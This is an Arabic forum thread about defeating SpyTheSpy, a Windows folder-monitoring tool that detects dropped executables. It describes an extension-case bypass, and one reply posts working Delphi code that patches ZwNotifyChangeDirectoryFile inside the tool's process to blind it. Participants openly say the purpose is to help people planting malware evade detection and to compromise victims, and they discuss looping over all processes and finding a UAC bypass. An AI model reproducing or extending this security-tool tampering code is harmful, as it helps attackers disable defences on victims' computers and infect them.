تم تحميل الصفحة في 0,3871494 ثانية
اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )
إنضم
1 نوفمبر 2013
المشاركات
4,655
الإعجابات
5,647
النقاط
113
الإقامة
Libya ( أ،أأˆأأ‡ )


آلحَمد للَه آلذي لُولآه مآ جَرى قَلم ، ولآ تَكلم آنسآن وآلصلآة وآلسَلآم عَلى

سَيدنآ مُحمد [ صَلى آلله عَليه وآله وصَحبه وسَلم ] كآن آفصَح آلنآس لسآنآ وآوُضحهم بيآنآ .



آهلا وسهلاً بكم

آعضاء نقطة آلتطوير آلكرآم


يتجدد بنا اللقاء


وان شاء الله نقدم كل ماهو جديد ..

لنفع المجمتع العربي

ومن اجل حماية افضل ..


شرح
بسيط لثغره قاتله في برنامج SpyTheSpy

وهي
عدم التعرف على الصيغه نفسها التي مخزنه بداخله بمجرد تغيير بسيط جدا

وهو
تعديل حرف من سمول الى كابتل والعكس

هذ
مثال

هو
يتعرف على هذه الصيغه

exe

لكن
لو حولناها الى

EXE

ما
راح يتعرف عليها

وباقي
الصيغ نفس الشي

عملت
شرح بسيط لهذه الثغره

وايضا
طريقة التعديل على البرنامج ليتعرف على بقية الصيغ


نحتاج الى

Olly


الشرح





كان معاكم اخوكم MrJoker

الاهداء الى
كل اعضاء و زوار منتدى ديف بوينت

في رعاية الله وحفظه..

و السلام عليكم ورحمة الله وبركاته
 
إنضم
7 سبتمبر 2014
المشاركات
640
الإعجابات
710
النقاط
93
الإقامة
أ‡أ،أŒأ’أ‡أ†أ‘
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

ههه الثغرة جميلة اخي تنفع يعني لاصحاب التلغيم الذين يخافان هذا البرنامج
 
إنضم
30 أكتوبر 2012
المشاركات
2,647
الإعجابات
1,533
النقاط
113
الإقامة
Kurdistan
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

شكرا علی هاذ شرح جمیل
 
إنضم
12 مارس 2011
المشاركات
579
الإعجابات
479
النقاط
63
الإقامة
[email protected]
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

مبدع اخي الكريم .... انا كنت بستعمل هذا البرنامج اما الأن فوداعاااا والى الأبد:637468:
 
إنضم
31 أغسطس 2011
المشاركات
7,093
الإعجابات
2,669
النقاط
113
العمر
8
الإقامة
Jordan
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

كود:
const
  RawData: array[0..5] of Byte = (
    $B8, $08, $00, $00, $C0, $C3
  );
var
  PID: Cardinal;
  hProcess: THandle;
  oldProtect: DWORD;
  addr: Pointer;
  r: NativeUInt;
  b: BOOL;
begin
  PID := FindProcess('SpyTheSpy.exe');
  hProcess := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_WRITE, False, PID);
  addr := GetProcAddress(GetModuleHandle('ntdll.dll'), 'ZwNotifyChangeDirectoryFile');
  b := VirtualProtectEx(hProcess, addr, 6, PAGE_EXECUTE_READWRITE, oldProtect);
  b := WriteProcessMemory(hProcess, addr, @RawData[0], 6, r);
  b := VirtualProtectEx(hProcess, addr, 6, oldProtect, oldProtect);
  CloseHandle(hProcess);
end;
كود دلفي لقتل هذا البرنامج التافه وكل البرامج على شاكلته :15:
على اي حال اي برنامج ما يحمي نفسه بهوكات على الأقل دالة OpenProcess يعتبر فاشل :33:
مع التنويه لازم البرنامج sts ما يكون يشتغل بصلاحيات مسؤول < الحين الكل يصير يشغله كمسؤول :15:
 
إنضم
1 نوفمبر 2013
المشاركات
4,655
الإعجابات
5,647
النقاط
113
الإقامة
Libya ( أ،أأˆأأ‡ )
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

كود:
const
  RawData: array[0..5] of Byte = (
    $B8, $08, $00, $00, $C0, $C3
  );
var
  PID: Cardinal;
  hProcess: THandle;
  oldProtect: DWORD;
  addr: Pointer;
  r: NativeUInt;
  b: BOOL;
begin
  PID := FindProcess('SpyTheSpy.exe');
  hProcess := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_WRITE, False, PID);
  addr := GetProcAddress(GetModuleHandle('ntdll.dll'), 'ZwNotifyChangeDirectoryFile');
  b := VirtualProtectEx(hProcess, addr, 6, PAGE_EXECUTE_READWRITE, oldProtect);
  b := WriteProcessMemory(hProcess, addr, @RawData[0], 6, r);
  b := VirtualProtectEx(hProcess, addr, 6, oldProtect, oldProtect);
  CloseHandle(hProcess);
end;
كود دلفي لقتل هذا البرنامج التافه وكل البرامج على شاكلته :15:
على اي حال اي برنامج ما يحمي نفسه بهوكات على الأقل دالة OpenProcess يعتبر فاشل :33:
مع التنويه لازم البرنامج sts ما يكون يشتغل بصلاحيات مسؤول < الحين الكل يصير يشغله كمسؤول :15:

كود جميل اهنيك اخوي حمزه

ان شاء الله يستفيدو منه الاخوان في تخطي و التلغيم

و شكرا على مرورك
 
إنضم
31 أغسطس 2011
المشاركات
7,093
الإعجابات
2,669
النقاط
113
العمر
8
الإقامة
Jordan
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

هذا البرنامج الصغير كاثبات فقط ضع اسم ملف في textbox واضغط الزر رح يكتب MZ بالملف
http://up.dev-point.com/download116829.html

طبعا بدون تغيير اسم البرنامج لأنه يدور على عملية باسم SpyTheSpy.exe وما تكون بصلاحيات مسؤول لأن الهاندل مش رح يرجع :26:

يعني الطريقة هذي فيها نقطة ضعف بانه تشغل برنامج sts كسمؤول، يعني اي احد يستخدمه ضروري يطبق الشرح اولا ويكون مشغل البرنامج كمسؤول دائما :15:
 
إنضم
1 نوفمبر 2013
المشاركات
4,655
الإعجابات
5,647
النقاط
113
الإقامة
Libya ( أ،أأˆأأ‡ )
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

هذا البرنامج الصغير كاثبات فقط ضع اسم ملف في textbox واضغط الزر رح يكتب MZ بالملف
http://up.dev-point.com/download116829.html

طبعا بدون تغيير اسم البرنامج لأنه يدور على عملية باسم SpyTheSpy.exe وما تكون بصلاحيات مسؤول لأن الهاندل مش رح يرجع :26:

يعني الطريقة هذي فيها نقطة ضعف بانه تشغل برنامج sts كسمؤول، يعني اي احد يستخدمه ضروري يطبق الشرح اولا ويكون مشغل البرنامج كمسؤول دائما :15:
اهلا بك مرة اخرى لدي تعليق على كلامك الاتي

طبعا بدون تغيير اسم البرنامج لأنه يدور على عملية باسم SpyTheSpy.exe
على حسب كلامك يجب ما يتغير اسم العملية يعني لو تم تغير
Windows Name
Class Name
Process Name
يتم الغى التخطي

ام بالنسبة لكلامك

يعني الطريقة هذي فيها نقطة ضعف بانه تشغل برنامج sts كسمؤول

كلامك سليم بعد قراة الكود اذا كان البرنامج يشتغل كمسؤول لا يشتغل التخطي
النقطة الضعف الاغلب الاشخاص الذين يستعملون البرنامج تلاقي البرنامج لا يشتغل كمسؤول و هنا النقطة الضعف لهذا لو يتم تخطي Uac في كود تستطيع تخطي البرنامج حتى لو كان كمسؤول لكن حاليا شروحات و افكار تخطي UAC مختفيه
يوجد شروحات فقط التعديل على قيمة في رجستري من 1 الى 0 لكي يتم تعطيل UAC و هذا لا يعتبر تخطي لهذا لو تم البحث و تنقيب جيدا سوف نجد طريقة للتخطي
و نقوم بترجمتها بالعديد من اللغات البرمجيه Delphi - VB.NET - C++ .......الخ

شرفني مرورك



 
إنضم
28 أكتوبر 2012
المشاركات
1,462
الإعجابات
1,261
النقاط
113
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

شكرا لك .. ماكنت ادري ان فيه ثغغغره هالبرنامج الضعيف :244:

جهد جببار .. اهنيك يامببدع :366:
 
إنضم
31 أغسطس 2011
المشاركات
7,093
الإعجابات
2,669
النقاط
113
العمر
8
الإقامة
Jordan
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

اهلا بك مرة اخرى لدي تعليق على كلامك الاتي



على حسب كلامك يجب ما يتغير اسم العملية يعني لو تم تغير
Windows Name
Class Name
Process Name
يتم الغى التخطي

ام بالنسبة لكلامك




كلامك سليم بعد قراة الكود اذا كان البرنامج يشتغل كمسؤول لا يشتغل التخطي
النقطة الضعف الاغلب الاشخاص الذين يستعملون البرنامج تلاقي البرنامج لا يشتغل كمسؤول و هنا النقطة الضعف لهذا لو يتم تخطي Uac في كود تستطيع تخطي البرنامج حتى لو كان كمسؤول لكن حاليا شروحات و افكار تخطي UAC مختفيه
يوجد شروحات فقط التعديل على قيمة في رجستري من 1 الى 0 لكي يتم تعطيل UAC و هذا لا يعتبر تخطي لهذا لو تم البحث و تنقيب جيدا سوف نجد طريقة للتخطي
و نقوم بترجمتها بالعديد من اللغات البرمجيه Delphi - VB.NET - C++ .......الخ

شرفني مرورك



لا صراحة يمكن التخطي لو تم تغيير اسم العملية او اسم الكلاس :15:
انا فقط حددت عملية معينة انت ممكن تجيب كل العمليات بالنظام وتعدل على الدالة NotifyChangeDirectoryFile فقط

وطبعا في طريقة تخطي الصلاحيات هذي لكني لا اعرفها :3:
 
إنضم
3 أكتوبر 2014
المشاركات
213
الإعجابات
185
النقاط
43
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

احسنت اخي ولكن برنامج exewatch هل تعمل هذه ثغرة معو ؟؟؟
 
إنضم
1 نوفمبر 2013
المشاركات
4,655
الإعجابات
5,647
النقاط
113
الإقامة
Libya ( أ،أأˆأأ‡ )
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

احسنت اخي ولكن برنامج exewatch هل تعمل هذه ثغرة معو ؟؟؟

لم اجرب صديقي لكن يمكنك القى نظره حول الصيغات التي يمسكها البرنامج عن طريق المنقح
 
إنضم
1 نوفمبر 2013
المشاركات
4,655
الإعجابات
5,647
النقاط
113
الإقامة
Libya ( أ،أأˆأأ‡ )
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

لا صراحة يمكن التخطي لو تم تغيير اسم العملية او اسم الكلاس :15:
انا فقط حددت عملية معينة انت ممكن تجيب كل العمليات بالنظام وتعدل على الدالة NotifyChangeDirectoryFile فقط

وطبعا في طريقة تخطي الصلاحيات هذي لكني لا اعرفها :3:

اه هناك العيب التخطي يأتي فقط عن طريق الف كود لكن يبقى المشكلة في اسم العملية او الكلاس نيم
لهذا يفضل استخدام مثل هذه الثغرات وسمعت انه البرنامج يحتوي على كثير من ثغرات
افضل من استعمال الطرق القديمه تبع جلب كلاسك نيم و بعدها ام القتل او الاخفاء و او مشابه فكن على يقين انه الاغلبيه دعنا لا نقول الجميع معدل على اسم العملية او اسم الكلاس لهذا يصعب التخطي حاليا و الكود يحتوي على اثنين من نقاط الضعف
1 : عند اشتغال البرنامج كمسؤول لا يعمل الكود
2 : اذا كان اسم العملية او اسم الكلاس نيم للبرنامج معدل عليه لا يشتغل الكود

نورت مرة ثانيه ):
 
إنضم
31 أغسطس 2011
المشاركات
7,093
الإعجابات
2,669
النقاط
113
العمر
8
الإقامة
Jordan
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

اه هناك العيب التخطي يأتي فقط عن طريق الف كود لكن يبقى المشكلة في اسم العملية او الكلاس نيم
لهذا يفضل استخدام مثل هذه الثغرات وسمعت انه البرنامج يحتوي على كثير من ثغرات
افضل من استعمال الطرق القديمه تبع جلب كلاسك نيم و بعدها ام القتل او الاخفاء و او مشابه فكن على يقين انه الاغلبيه دعنا لا نقول الجميع معدل على اسم العملية او اسم الكلاس لهذا يصعب التخطي حاليا و الكود يحتوي على اثنين من نقاط الضعف
1 : عند اشتغال البرنامج كمسؤول لا يعمل الكود
2 : اذا كان اسم العملية او اسم الكلاس نيم للبرنامج معدل عليه لا يشتغل الكود

نورت مرة ثانيه ):
الكود فيه مشكلة وحدة فقط :15:
هي لو شغلت sts كمسؤول لن يعمل
اما الثانية يمكن حلها بالتعديل على جميع العمليات :15:
والاولى يمكن حلها بس ما اعرف الحل :15:
 
إنضم
1 نوفمبر 2013
المشاركات
4,655
الإعجابات
5,647
النقاط
113
الإقامة
Libya ( أ،أأˆأأ‡ )
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

الكود فيه مشكلة وحدة فقط :15:
هي لو شغلت sts كمسؤول لن يعمل
اما الثانية يمكن حلها بالتعديل على جميع العمليات :15:
والاولى يمكن حلها بس ما اعرف الحل :15:
اهلا مرة اخرى

بالنسبة للكلامك

الثانية يمكن حلها بالتعديل على جميع العمليات
مثلا انا عندما اجي بأخترق واحد معه برنامج SpyTheSpy و معدل عليه اسم العملية او كلاسك نيم هنا السؤال كيف راح تعرف اسمائهم ؟ ام تخمين ؟
اذا كان تخمين شوف عرفك انه مو مسيه اسم مثل [email protected]#@[email protected]#$!4
لهذا هذه المشكلة تبقي من دون حل


 
إنضم
31 أغسطس 2011
المشاركات
7,093
الإعجابات
2,669
النقاط
113
العمر
8
الإقامة
Jordan
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

لا مو تخمين
تعمل حلقة
تجيب كل العمليات الي شغالة وتعدل عليها :15:
 
إنضم
1 نوفمبر 2013
المشاركات
4,655
الإعجابات
5,647
النقاط
113
الإقامة
Libya ( أ،أأˆأأ‡ )
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

لا مو تخمين
تعمل حلقة
تجيب كل العمليات الي شغالة وتعدل عليها :15:

كلام منطقي و يمكن تنفيذه لكن يستغرق وقت

 
إنضم
14 نوفمبر 2013
المشاركات
4,797
الإعجابات
4,448
النقاط
113
الإقامة
.::∫ I̷R̷A̷Q̷ ∫::.
رد: اثبات عمل ثغرة برنامج كاشف المسارات SpyTheSpy مع شرح ترقيعها ( حصريآ )

بااارك الله فيك ياغالي

طه ويعطيك الف عافيه

ياحبيبي

يـوشم بل خماـسي
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل